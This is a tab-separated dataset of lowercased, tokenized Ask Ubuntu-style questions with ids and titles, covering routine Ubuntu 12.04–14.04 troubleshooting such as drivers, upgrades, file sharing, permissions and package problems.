opengl does not seem to be missing in general since i am able to run graphically intensive programs . however , i am not sure if the opengl plugin is a different thing then opengl used for things like gaming ( i feel shame admitting that ) . i am off to do research on this and will report back when i have some more information .
454780	zoom window in gnome overview mode	i just upgraded from ubuntu 12.04 to 14.04 ( gnome version ) . in 12.04 when i entered overview mode , i could zoom any window shown by moving mouse pointer over it and using mouse wheel . this has no effect in 14.04 . is it possible to enable this functionality in 14.04 and how ?
454788	ca n't share external harddrive	i want to share an external harddrive over my little network . i 'm not using samba , but the nautilus-share option ( i know , also samba ) . right click on a folder - sharing options shows an error message that i am not the user , so do n't have the permission to share . the drive is mounted on /media/diskname . i have tried to change the permissions , with : sudo chown username : username -r /media/diskname sudo chmod 777 /media/diskname nothing , still get the error . permissions did n't change . why ?
454790	touchpad is n't working on my netbook	i just installed a fresh copy of ubuntu 14.04 and everything is working fine but the touchpad of my laptop is n't working at all , my netbook is a lanix neuron lt . when i had windows 8 my touchpad was working fine .
454791	account plugin evernote does n't login ubuntu 14.04	i installed the accout plugin evernote from synaptic , evernote appears in an online account in the settings but i ca n't `` sing in '' ,
454792	how do i add another graphics card ? it doesnt show up on aticonfig -- lsa	i 've just added another graphics card to the computer , same brand as the other . i used aticonfig -- initial -- adapter=all and rebooted , but it still wo n't show up . will i have to reinstall the drivers from the beginning ?
454797	installation of `` gdb64 '' on trusty removes `` ubuntu-minimal '' , is that right ?	i have a 64-bit ubuntu trusty and i 'm trying to install the package gdb64 but , i 'm seeing the following packages that are about to be removed , look : sudo apt-get install gdb64 ... .. the following packages will be removed : devscripts python3-apt python3-chardet python3-dbus python3-debian python3-magic python3-pycurl python3-six python3-software-properties software-properties-common ubuntu-minimal unattended-upgrades ... .. is that right / expected ? ! i 'm newbie with gdb ... can i install gdb instead ? i 'll need to debug a 64-bit binary ...
454798	about this computer not working on ubuntu-14.04 arm	i am using the ubuntu-14.04-core-armhf and have installed ubuntu-desktop . on the ubuntu desktop , if i click `` about this computer '' - nothing shows up . after this if i try to click `` system settings '' , again nothing comes up . but when i reboot and click on `` system settings '' , it works fine . only `` about this computer '' is causing issues . on my host machine ( intel ) , which has ubuntu 14.04 - `` about this computer '' button works fine as intended .
454803	new user . ca n't install updates because i do n't know the pass word	new user trying to update software but do n't know the authentication pass word
454804	defective built-in hotspot feature	after a fresh install of 14.04 , i tried the built-in create a hotspot feature on system settings > network . turns out , my wireless card does not support this feature on linux ( though i can create wireless hotpost on windows 7 , but this belongs to another question ) . anyway , whenever i open my system settings > network , i see that hotspot is on , even though i closed it before . if i enable aeroplane mode on , still hotspot mode stays on . the main problem is , since hotspot is on , it prohibits me to connect to any wireless network . any suggestion will be most appreciated . my wifi card : wlan0 link encap : ethernet hwaddr 00:16:44 : f0:91 : e5 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) -network description : wireless interface physical id : 1 bus info : usb @ 2:6 logical name : wlan0 serial : 00:16:44 : f0:91 : e5 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8187 driverversion=3.13.0-24-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11bg 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 )
454805	python import module error	everytime i run my script i get : file `` ./ciinstall.py '' , line 35 , in < module > import npyscreen importerror : no module named npyscreen here is my code . it checks to see if mypyscreen is installed . if not then install it then import . if it is then import . but instead its giving me an error . # installing npyscreen before importing npyscreen for menu ui npy = subprocess.call ( shlex.split ( 'locate npyscreen-3.2.egg-info ' ) ) if npy == '1 ' : os.chdir ( '/opt/ ' ) subprocess.call ( shlex.split ( 'sudo wget https : //pypi.python.org/packages/sou $ subprocess.call ( shlex.split ( 'tar xvf npyscreen-3.37.tar.gz ' ) ) os.chdir ( 'npyscreen-3.2 ' ) subprocess.call ( shlex.split ( 'sudo ./setup.py ' ) ) subprocess.call ( shlex.split ( 'sudo rm npyscreen-3.37.tar.gz ' ) ) import npyscreen
454807	bfd.h should include libiberty/ansidecl.h in ubuntu 14.04 ?	binutils package seems to be changed , as include directory of libiberty.h has moved to /usr/include/libiberty , thus there is possible a wrong include in bfd.h regarding ansidecl.h . getting those compile errors when using binutils trace utilities /usr/include/libiberty/libiberty.h : in function ‘basename’ : /usr/include/libiberty/libiberty.h:110:38 : error : expected declaration specifiers before ‘attribute_returns_nonnull’ extern char *basename ( const char * ) attribute_returns_nonnull attribute_nonnull ( 1 ) ; ^ /usr/include/libiberty/libiberty.h:121:45 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘attribute_returns_nonnull’ extern const char *lbasename ( const char * ) attribute_returns_nonnull attribute_nonnull ( 1 ) ; ^ /usr/include/libiberty/libiberty.h:126:49 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘attribute_returns_nonnull’ extern const char *dos_lbasename ( const char * ) attribute_returns_nonnull attribute_nonnull ( 1 ) ; ^ /usr/include/libiberty/libiberty.h:132:50 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘attribute_returns_nonnull’ extern const char *unix_lbasename ( const char * ) attribute_returns_nonnull attribute_nonnull ( 1 ) ; by changing bfd.h to include /usr/include/libiberty/ansidecl.h , everything went fine in my compilation . please , any hints for this issue ? thanks .
454815	help installing wacom intuos pen ( ctl-480 ) in ubuntu studio 14.04 ?	i am very new to linux terminal work , but that 's all that is available when it comes to installing the driver for the wacom intuos pen . what works : i plug in my wacom intuos and the computer recognizes it . i am able to move the cursor via the pen . what does not work : the art program , gimp , has difficulty recognizing the tablet at times . at random , it senses the pressure sensitivity , and other times it does not . i am also unable to navigate through internal menus ( such as the preferences and save menus ) unless i turn off or unplug my tablet and switch to the mouse . does anyone know how to install the drivers needed ? gui , terminal , archive , whatever . i just really want to use ubuntu studio for what it was developed for instead of working around the [ big ] kinks .
454820	ubuntu virtualbox display driver ?	i have a dell e6230 , installed ubuntu 14.04 in virtualbox . the display defaults to 600x400 showing the upper left corner of the screen . it 's the only resolution that shows in the gui . how do i get it to a higher resolution ? the system has an intel hd graphics 4000 .
454821	how to add a hi resolution wallpaper	well , i want to put a wallpaper 1920x1080 , ubuntu set the wallpaper but does n't show it ( it has a black screen ) can anybody help me ?
454823	ubuntu not starting on disk	i get a screen with a keyboard , dash , and stick figure at the bottom . after a few seconds , i get a black command line with a kernelpanic error . i have tried the dvd boot help install program and does n't help . i also tried linux with the same thing happening . my specs windows xp with intel pentium 4 and 2 gb of ram . please help . i imagine people saying wow when i 'm only thirteen . i 'm experienced with computers . 8 years exact .
454826	using lamp with ubuntu desktop	so , i 'm using ubuntu desktop and have installed apache , php and mysql , all working great . i want to use start adding files and folders to /var/www using the file manager , but my user does n't have permissions to do this . any ideas what permissions i need to update ?
454829	run `` sudo service udev reload '' without root priviledges	i have a script that occasionally needs to run the command `` service udev reload '' but can not as it needs root access . i do n't want to stay logged in as root all the time , so i 'm wondering if there is a way to change permissions for this command . i 'm on 12.04 . any ideas ?
454834	how can i get old video drivers back ?	no matter what i watch on hulu , or when i watch it , i see annoying flickering . it does n't happen on youtube , southparkstudios , or various other websites with videos that i have used since since updating to 12.04 . more details : i put a few different ubuntu versions on my old windows laptop . for ubuntu 10.10 i had to install a couple of proprietary software drivers , including i think some video drivers . but this new install ( 12.04 ) never asked me if i wanted to install those . and the command jockey-text -l run from terminal which is supposed to tell me about proprietary drivers does n't list any video drivers . why did n't it ask me if i wanted the drivers again , as that seems the likely issue . what can i do to get the drivers myself ? why does anything work if there are no drivers ? on a side note i 've noticed if i deliberately tax the cpu on my computer , hulu plays a little more smoothly . it seems to lag and only play fewer frames per second . it 's as if it is skipping over the frames that were previously glitching out or something . update : i just discovered that using a pop out window makes the videos play perfectly . so i guess maybe this is a problem with their web page and not an ubuntu problem . but i 'm still curious about the drivers not being there . in windows there was some place i could go look at all the drivers , is n't there some kind of analogous place in ubuntu ?
454838	lubuntu window borders are gone and mouse cursor is a black x	i was writing a python script to do some basic stuff with skype . i included in this script a way to remotely reboot the computer . i used it , the computer rebooted as expected , but when it came back up , the cursor and window borders were gone . after a bit of messing around , i managed to log out and log into the root account . in there , the cursor was back , but the window borders were gone . i rebooted once more and the cursor , after some time , became a black `` x '' . at the moment , the cursor is an x and all my window borders are gone . i 'm using lubuntu 13.10 .
454842	play songs on banshee without iphone	i exported music from my iphone and then imported back into banshee but it will not let me play the songs that i got from my iphone without the iphone being plugged in ( just stays on idle and doesnt respond ) , is there any way to fix this ?
454845	ubuntu 12.04-13.10 wireless is n't working on acer e-422	`` enable networking '' button does n't work on my acer e-422 . please tell me how to enable wireless internet for acer e-422 .
454847	does anyone know how to reset a windows 7 administrator password with linux ?	if so , please help and advise . i do not have a reset disc and i only have one administrator account .
454848	i ca n't create more than one virtual machine with vmbuilder	i 'm testing the creation of virtual machines with ubuntu . the first virtual machine was created with the default settings and is called ubuntu : virsh -- connect qemu : ///system list -- all id name state -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ubuntu shut off i 'm creating an additional virtual machine : vmbuilder kvm ubuntu \ -- suite saucy \ -- flavour virtual \ -- user demo \ -- pass demo \ -- arch amd64 \ -- dest /var/vm/demo1 \ -- part vmbuilder.partition \ -- domain demo1 \ -- ip 192.168.1.3 \ -- mask 255.255.255.0 \ -- gw 192.168.1.1 \ -- dns 192.168.1.2 \ -- libvirt qemu : ///system \ -- addpkg linux-image-generic \ -- addpkg openssh-server the command fails with the following error : domain ubuntu already exists at qemu : ///system why is it sticking with ubuntu ? is n't it the purpose of -- domain to set the name of the domain ?
454849	change nobody account to /sbin/nologin ?	os : ubuntu server 12.04 lts i 'm in the process of locking down a web server computer and i noticed that the nobody user has /bin/sh . is it safe to change it to /sbin/nologin or would that break anything ?
454852	how to use 22 pixel size icons for toolbars in ubuntu 14.04	is there a way to tell the theme engine to use 22 pixel size icons for toolbars ? i like to use the fs icon set ( http : //franksouza183.deviantart.com/art/fs-icons-ubuntu-288407674 ) with ubuntu . however , in ubuntu 14.04 , gedit ( and perhaps some other programs as well ) now use 24 pixel size icons . the gedit toolbar requires 24 pixel size icons , but the fs icon set has 22 pixel icons , and the next larger size is 32 pixel icons . as a result , the available icons are scaled to fit the gedit toolbar , and `` fallback '' icons are used for anything that is missing . as you can see in the screen-shot below , the gedit icons look fuzzy under ubuntu 14.04 . also , the monochromatic icons for the `` open '' , `` search '' , and `` search & replace '' tools are missing , so uncoordinated colored icons are used instead .
454854	manage snapshots	so ubuntu supports lvm . this in turn supports creating and restoring snapshots of the hard drive . coming from windows , this is a highly useful feature for restoring the system to a previous point ( in windows called system restore ) , also great for backups ! i would specifically like to schedule snapshots to be taken periodically ( say every sunday ) and would also like an easy way to manage and delete snapshots . and of course , to restore back to a snapshot if need be . how can i do this ?
454857	top and side taskbar dissappared	i updated my copy of 14.04 ubuntu today and now ive lost the top and side task bars please could some one help me out i have tried reinstalling the graphics drivers but that didnt help . http : //imgur.com/n7wbwp8 shows there is no taskbars .
454858	using the themes in the repository ( 14.04 )	ubuntu 's unity-tweak-tool only has three themes , ambiance , highcontrast , and radiance . the repository appears to have quiet a few . i installed gnome-themes-ubuntu via synaptic . the description shows it contains , dust , dust san and new wave . none of those three appears in the unit-tweak-tool menu . however they do appear in the gnome-tweak-tool 's menu . when i select them from gnome-tweak-tool , nothing happens . is there another step to use these themes in ubuntu 14.04 ? also , is there some way of getting a list of themes ( more than just the default three mentioned above ) for ubuntu 14.04 ?
454863	how to i use androidx86 ubuntu dualboot ?	i dualbooted androidx86 and ubuntu , and used the 40_custom file . so when i choose android kitkat from grub2 menu , it starts android , and it loads for ever in the page where the glossy android is written . i waited for 40 minutes and still nothing . how can i boot into androidx86 ?
454864	is there a way to bring the terminal to the front when whatever i launched is done ?	so i 'm wondering if it was possible to bring in front my terminal when what i ran is now done . i 'm not taking about a one time stuff like run_long_task ; bring_to_front_somehow ; but something that would do it automatically . this would greatly improved my productivity : ) i 'm using zshell ( if that helps )
454868	why are no ocr engines working in gscan2pdf after upgrading to 14.04 ?	i recently upgraded to ubuntu 14.04 , but the ocr in gscan2pdf stopped working . i am using the latest gscan2pdf ( 1.2.4 ) with both tesseract and cuneiform available . when loading pdf documents in gscan2pdf , both ocr engines are available and they look like they are working , but no output . i tried using various older versions of gscan2pdf to no avail . it was working fine with 13.10 . this function is very important for my work . i would appreciate any ideas .
454876	install libfribidi-bin on ubuntu 12.04	i need to install a package named libfribidi-bin . this package is available starting from 12.10 , so i ca n't install it directly using the 12.04 packages repository . i 'd like to download the package shipped in some newer version and install , but i wonder two things : which ubuntu version should i choose to get the package ( 12.10 , trusty ) ? could introducing new packages this way cause problems or break dependencies ? what is the suggested way to install libfribidi-bin in my case ?
454877	install keeping data	i have been keeping the '/home ' directory on a separate partition for so long that i have forgotten what happens with '/home ' as part of the '/ ' partition . if /home is just part of / in the same partition and i install ubuntu from cd to replace another distribution like mint , can i do this without destroying the general data and the user settings in /home ?
454880	upgraded to 14.04 gnome and the resolution and sizes of icons , bars and windows are wrong	i just upgraded from 13.10 gnome remix and on restart i had to change the resolution back . but almost everything is the wrong size . the icons are way smaller and the top bar is too big . changing settings is a pain because the windows are way too big to see everything on them . i tried changing the graphics driver but that did nothing . i also tried messing with the tweak tool but half of it is unreachable . it says i have the right resolution and chrome seems to be the right size ( same as it was ) except the omnibar is twice its normal size . i do n't have a graphics card -- it is on the processor ( an amd a8 5500 3.7ghz quad radeon ) . update fixed not sure how but it involved a lot of restarting and recovery mode .
454881	where is my jdk ?	i installed oracle java 1.8 using ppa . when i list java alternatives , i can only see 1.8 jre ! but when i do javac -version i can see javac 1.8.0_05 sudo update-alternatives -- config java there are 3 choices for the alternative java ( providing /usr/bin/java ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/lib/jvm/java-8-oracle/jre/bin/java 1073 auto mode 1 /usr/lib/jvm/java-7-openjdk-i386/jre/bin/java 1071 manual mode 2 /usr/lib/jvm/java-7-oracle/jre/bin/java 1072 manual mode * 3 /usr/lib/jvm/java-8-oracle/jre/bin/java 1073 manual mode here is what i see when i run sudo update-alternatives -- config javac there are 2 choices for the alternative javac ( providing /usr/bin/javac ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/lib/jvm/java-8-oracle/bin/javac 1073 auto mode 1 /usr/lib/jvm/java-7-oracle/bin/javac 1072 manual mode * 2 /usr/lib/jvm/java-8-oracle/bin/javac 1073 manual mode press enter to keep the current choice [ * ] , or type selection number : i can only see 1.8 jre in eclipse and not 1.8 jdk . what am i missing ? i want to be able to create a java project targeting jdk 1.8 . it looks like i have javac setup fine but why does it not show up in eclipse in the list of jdk ?
454882	what are the steps needed to implement a qt class or member function into a qml project for ubuntu-touch ?	qt contains many classes and functions that are useful for a qml project , but not readily available . the existing solutions do not employ a method that is platform independent , thus it is unclear whether it will work for ubuntu-touch devices . in order to add the functionality of a qt class or one of its member functions , what steps need to be followed , and why do they need to be included ?
454885	desktop manager error ubuntu 14.04	i just did an upgrade last night to ubuntu 14.04 lts . it seems there is a problem and it would be great to fix it . also it seems this is preveniting wallsh ( desktop wallpaper changer ) from working . i keep getting the following error message : error : desktop manager is not active
454895	update manager bug : encountered a section with no package : header	i tried to do an update to my system ( 12.04 lta 64bit , on acer aspire v5 ) got this : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened . now what ?
454896	why does my sound play out of headphones and speakers ?	i have noticed that when i plug in my headphones to my computer , my headphones play the sound fine , but if i turn the volume up loud enough , it also plays softly out of my laptop 's built in speakers . some info that might be useful : my computer : mid 2012 macbook pro running ubuntu with the xubuntu-desktop package installed ( this only happens in xubuntu ) also , there is a red light coming out of my headphone jack , but only in ubuntu , not when i boot from mac os x , but all sound and microphone things work fine in ubuntu ( except for this )
454897	buffalo terastation nas cifs	i have a buffalo nas unit . i 'm mounting it via cifs . i can write the files to the nas , but i ca n't update times , permisions , ect . here is the fstab entry : //192.168.1.4/nas /media/nas cifs rw , password= < password > , file_mode=0777 , dir_mode=0777 , uid= < user > , gid=users 0 0 the mount dir is ls -la /media/ drwxrwxrwx 2 < user > users 0 apr 24 10:30 nas can someone point me at what i 'm doing wrong ?
454901	why custom launcher icon keep pulsing ?	i created a custom launcher icon to enable/disable the touch feature of my lenovo x220 tablet . [ desktop entry ] version=1.0 name=handsoff comment=enable / disable touch feature exec=thinkpad-touch icon=/usr/share/icons/gnome/scalable/apps/preferences-desktop-keyboard-shortcut\ s-symbolic.svg terminal=false type=application categories=utility ; x-desktop-file-install-version=0.22 if i click on it , it launch the command successfully , but then it keep pulsing for 5 seconds , and it is impossible to launch the command again to re-switch . why does it keep pulsing ? the command is executed immediately ! how can avoid this ?
454903	sftp file to apache2	i have an edit file and would like to use sftp to upload to apache2 . does ubuntu have sftp or i need to find one to install it to machine ? your information and help is great appreciated , regards , inung
454909	accidentally run gl-setup by default user . can not log in to server	i installed git and gitolite in my new server . in gitolite installation steps , i executed gl-setup command accidentally by my default user . not with git user . now i am unable to log in to server . it says pty allocation request failed on channel 0 hello id_rsa , this is gitolite 2.2-1 ( debian ) running on git 1.7.9.5 the gitolite config gives you the following access : . is there any solution to resolve this . thanks
454910	how can i connect ubuntu 14.04 to my wireless printer canon mp620	i 'm running ubuntu 14.04 as a guest os in virtualbox . windows 7 is the host . i can get on the web just fine . i can ping my wireless printer just fine . i can login to my printer 's administrative web site just fine . when i add the printer to cups and try to print to it i get the message that the printer is n't responding . any suggestions on how to get it working ? thanks in advance .
454915	how to start windows after having installed ubuntu 14.04 ?	i 've just installed ubuntu 14.04 on a separate partition . however , when i turn on my computer there is no option to start windows - actually there is no option at all , it just starts ubuntu automatically . so , how can i go to windows again ?
454917	how to disable the drag & drop makes to move files or directories feature in thunar ?	on thunar 1.6.3 , drag & drop makes to move files or directories . sometimes i make a mistake and copy files around and not know it , so i do n't know what files or directories are move . is there any way to disable this feature ?
454918	weird overlapping panel after sleep on ubuntu 14.04	whenever i resume my laptop from sleep , there is over lapping on the panel . i have provided the image . i am running ubuntu 14.04 64 bit on my laptop .
454922	upgrade to ubuntu 14.04 failed	i did an upgrade in place from 12.04 . after the system reboots , i get a login screen . after i login , i get a dialogue box saying `` system program problem detected do you want to report the problem now ? '' with options cancel and report problem . regardless of which option i choose , i 'm left with a screen that 's blank except for `` ubuntu 14.04 lts '' in the lower left corner . the system is up and running , i can see and access - from other machines - shares from the network . ctrl-f1 lets me login , and i get messages for each of my 4 disks like : /dev/sdb1 should be checked for errors i 'm not all that handy with the linux command line , what should i try ?
454924	nepali font rendering problem in firefox	i have installed so many nepali fonts in my computer . but firefox do not show all nepali fonts properly .
454926	ubuntu lag on vmware	so my ubuntu on vmware is lagging horribly . its been working just fine but started to lag out of the blue . i had not installed anything nor was i running a whole lot of things , just 7 or 8 tabs on firefox , eclipse 3.0 as well as 3 or 4 tabs on gedit as well as a terminal . the specs thus far are os : ubuntu 13.10 memory : 15gb ( 38 % used ) processors : 4 , 1 core each , i5 3210m @ 2.50 ghz ram : 3.5 gb at first i thought the issue was the processors , as previously i had enabled only 2 processors for the vm , so when it started to lag i increased it to 4 processors each with 1 core . this does n't seem to have fixed it though . its very weird since previously the machine was working just fine , zero lag , i made no updates nor did i install any new files . what do you guys think could have gone wrong and how do i fix it ? iâm working on a project due tomorrow so cant afford the time wasted waiting for stuff to happen .
454927	want to change password my login	i want to change my computer 's password . right now my password is abc123 . i run this command : sudo passwd i entered my current password and then a new one but the change does not take effect . how can i resolve this problem ?
454929	dosbox is unable to run c program	i am using ubuntu 12.04 lts and i installed dosbox emulator to run tc . dosbox is working fine . but when i try to run program on the c drive than dosbox is closed automatically . i am using ctrl+f9 to run the program . see the terminal output umeshkumar @ labe-1294-0-170 : ~/downloads $ dosbox dosbox version 0.74 copyright 2002-2010 dosbox team , published under gnu gpl . -- - config : loading primary settings from config file /home/umeshkumar/.dosbox/dosbox-0.74.conf mixer : got different values from sdl : freq 44100 , blocksize 512 alsa : ca n't subscribe to midi port ( 65:0 ) nor ( 17:0 ) midi : opened device : none dosbox switched to max cycles , because of the setting : cycles=auto . if the game runs too fast try a fixed cycles amount in dosbox 's options . any help ?
454930	mouse cursor blinking after ubuntu 14.04 installation	i 've just installed ubuntu 14.04 . the mouse cursor wo n't stop blinking , and sometimes disappears . i 've seen some other posts , but they 're all about ubuntu 12.04 or 13.10 .
454931	canon mg6320 is not printing from cups	my canon printer will display processing when i press print , but then it just disappears and does not print the page . how can i fix this ?
454934	how can i extract pages containing a given string from a pdf file ?	i have a pdf file containing 100 pages . i would like to extract those pages containing a particular string . how can i achieve this ? maybe by using ghostscript on the command line ? for what it 's worth : i am using edubuntu 12.04 lts .
454936	copy app error : `` the open file ulimit level is too low , please increase it otherwise changes will not be detected properly ''	when using copy , i get this error : error : `` the open file ulimit level is too low , please increase it otherwise changes will not be detected properly '' the application stops syncing when it appears , why , and how do i fix it ?
454939	how to get back to my user account ?	i was running ubuntu 13.10 and i got a window indicating i could upgrade to 14.04 . i accepted the upgrade , and after the upgrade was finished i was left with an empty unity background and a mouse pointer . after rebooting a few times without getting anything i decided to download the iso image for 14.04 and ran the installation again from the disk . during the installation i selected the option to keep all the user files intact . the installation asked me for a username and a password . i used my first name as username ( my previous username was different , it was my nickname , but i could not remember at the time . for the password i used the same as the password i had before . now when i sign in i donât see any of the settings i had before . all icons are gone from the desktop and from the unity launch bar . when i launch files i can see `` computer '' file system and i can still see the home folder and under that i can see a folder with my new username and another with my previous username . this folder has all my files in it ( desktop , documents , downloads , music , pictures , etc. ) . i tried creating a user with my nickname ( the same name as that folder ) and used the same password , but i can not login with it . i need help getting back as that user so that i can see all the apps and environment as i used to . can someone help ?
454942	how to convert kilobytes to megabytes or gigabytes through terminal ?	i try to find the size of my disk , so i runned the below command $ sudo fdisk -s /dev/sda 976762584 it shows like above . i think the size ( 976762584 ) of the disk is shown in kilobytes . how do i convert the value to megabytes or gigabytes through terminal for better understanding ?
454945	computer noob needs help with video format conversion	i need to convert 2 movies from the .mks format to a .mp4 or .avi file . how would i do that ? i would prefer doing this in a gui as i am not comfortable with the command line interface .
454946	error executing xilinx ise design suite .bin file ( java xsetup )	i 'm , trying to build xilinx_vivado_sdk_2014.1_0405_1_lin64.bin on ubuntu-12.04 got the below error : ... .. ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ./xsetup : line 23 : /tmp/selfgz477916398/tps/lnx32/jre/bin/java : no such file or directory steps i did : $ cd /bin $ sudo mv sh sh.old $ ln -s bash sh $ cd ~/downloads $ chmod +x ./xilinx_vivado_sdk_2014.1_0405_1_lin64.bin $ sudo ./xilinx_vivado_sdk_2014.1_0405_1_lin64.bin $ java -version java version `` 1.7.0_51 '' openjdk runtime environment ( icedtea 2.4.4 ( 7u51-2.4.4-0ubuntu0.12.04.2 ) openjdk server vm ( build 24.45-b08 , mixed mode ) can anyone help me fix this ?
454949	ubuntu 14.04 system freezes - firefox eats a lot of memory with nvidia-prime enabled	i have a clean install of ubuntu 14.04 on a dell xps l502x laptop with a discrete , optimus-enabled nidia card . system was working great until i decided to install bumblebee to enable the nvidia card ( from the universe repository , not the ppa ) . then , opening firefox caused the system to freeze , eating all of the available memory ( according to htop ) . killing firefox unfreezes the system . i tested nvidia prime instead of bumblebee , because i thought it might be a bug in bumblebee , but when the nvidia card is enabled in prime , firefox freezes the system , and with the intel card , it does n't . is this a known issue ? is this happening to other people or with other apps while the nvidia card is enabled ?
454951	myth 2 on 64 bit xubuntu 13.10 needing libs openal 32 bit , and how to install that ?	i have myth 2 soulblighter with no in game sound at all . which needs lib-openal 32 bit for it to actually work . i 'm of course running xubuntu 13.10 64 bit , any one know how to get this installed for 32 bit games that need it ?
454955	using amixer to control volume	i 'm running 14.04 , and i was told i could use amixer to control volume via the command line . for example , to mute sound you would use amixer set master mute the output for me is amixer : unable to find simple control 'master',0 so i did some man reading and found out i needed to replace master with the name of my laptop 's mixer control . typing amixer returns : simple mixer control 'iec958',0 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ off ] so naturally , i enter amixer set iec958 mute but all i get is simple mixer control 'iec958',0 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ off ] once again . i 've tried sset and some other commands but every single one returns the same text . also , why is there no `` master '' or `` speaker '' controls ? is there something i 'm doing wrong ?
454959	file transfer ubuntu to windows	i am trying to transfer a large amount of files from ubuntu to windows 7 ( my music library , ~70gb ) . i put the files on an external hdd . from ubuntu , i can see all the files . from windows , about ~1000 files are missing . the missing files seem to be mostly files i tampered with from ubuntu such as converted , but also other `` random '' files . when i reload the external hard drive , all the files are there . i am transfering between two physical computers , so i have to use an external drive with using the ntsf file system . what 's happening ?
454962	how to setup remote user accounts and files on ubuntu 14.04 server	i have just installed ubuntu 14.04 server and have downloaded the gui . i have never used ubuntu before and what i want to do is setup accounts that can be logged in from my pc and mac . i have a wireless network and my macs are on mavericks and windows on 8.1 . thanks
454963	trouble with updates	when i attempt to do any updates , i receive the following error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_restricted_binary-i386_packages , e : the package lists or status file could not be parsed or opened .
454967	can not connect to my local ubuntu file server with ssh sftp or samba	i have a ubuntu desktop install [ ubuntu 14.04 ] that i am using as a server for my movies and photos so i can always be backing up via crashplan . i have this server setup with ssh and samba so i can sftp to it to update files and retrieve /view files via samba . everything was working fine but i am suddenly getting errors like : ssh : connect to host 192.168.0.7 port 22 : no route to host and samba plain not connecting . my network is setup with ethernet as such . and i am making sure i am on the d-link server when trying to connect . cable modem | | asus rt-n16 wireless router | | d-link wireless router | | server the servers internet connection works fine . crashplan has been uploading for days . pings to gmail.com and similar work fine . but i cannon even ping my server : users-macbook-air : ~ user $ ping 192.168.0.7 ping 192.168.0.7 ( 192.168.0.7 ) : 56 data bytes ping : sendto : no route to host ping : sendto : host is down request timeout for icmp_seq 0 ping : sendto : host is down request timeout for icmp_seq 1 ping : sendto : host is down request timeout for icmp_seq 2 ping : sendto : host is down request timeout for icmp_seq 3 ping : sendto : host is down request timeout for icmp_seq 4 ping : sendto : host is down request timeout for icmp_seq 5 ping : sendto : host is down request timeout for icmp_seq 6 ping : sendto : host is down request timeout for icmp_seq 7 ping : sendto : host is down request timeout for icmp_seq 8 i am not sure what the problem would be or how to even go about finding it . i have reinstalled ssh and samba with no luck as well as checking that there is no firewall and that there is no odd settings in my routers , both of which have the latest firmware . i even have this problem if my laptop is connected by ethernet to the dlink server . edit : arp-scan returns : movies @ movies : ~ $ sudo arp-scan -- interface=eth0 -- localnet interface : eth0 , datalink type : en10mb ( ethernet ) starting arp-scan 1.8.1 with 256 hosts ( http : //www.nta-monitor.com/tools/arp-scan/ ) 192.168.0.1 5c : d9:98:6a:60:08 d-link corporation 1 packets received by filter , 0 packets dropped by kernel ending arp-scan 1.8.1 : 256 hosts scanned in 1.869 seconds ( 136.97 hosts/sec ) . 1 responded ufw status returns : movies @ movies : ~ $ sudo ufw status status : inactive
454968	ubuntu one error `` com.ubuntu.one.fsevents ''	this may be a duplicate , but i have yet to get an answer on this question so i 'm posting it again as i need a response . i have a mac running mavericks and i installed ubuntu one awhile back . i have run the uninstall sequence click here , but yet com.ubuntu.com.fsevents is running on boot up every time i start my computer . the only way to stop it is to open terminal and run the following each and every time i boot up ; sudo launchctl remove com.ubuntu.one.fsevents .
454970	how do i install intel graphic drivers on ubuntu 14.04 for dell inspiron n4050	i have dell inspiron n4050 i5 4gb ram laptop and i recently installed ubuntu 14.04 on it . i need to install graphic drivers on it and do n't know how .
454974	problems with video playback speed and sound in 14.04 ?	my machine is having problems with video playback with both smplayer and the built in player . the videos are sped up and sound is chopped . i did n't change any settings or mess with them in any way since my upgrade or before . anyone else have this problem ? all my reading leads me to believe it is an issue with the nvidia driver , but am still unsure . if so should i wait for an update or do it myself ? i have nvidia速 quadro速 nvs 160m5 256mb ddr25 running on a dell latitude e6400 .
454978	boot error when update to ubuntu 14.04	i recently updated my system to ubuntu 14.04 and now i can no longer boot into any form of graphical interface . i can access the recovery and then resume boot into a basic terminal and everything seems to be working fine . i do n't know if the graphics drivers are to blame or if its a dependency that 's broken that i got an error on . i was on the amd proprietary drivers ( i believe 13.10 ? i ca n't remember the version ) so it might not have compatibility with the update . if so could someone link me to a guide on how to concert back over to open source drivers to get it back and operating . thanks .
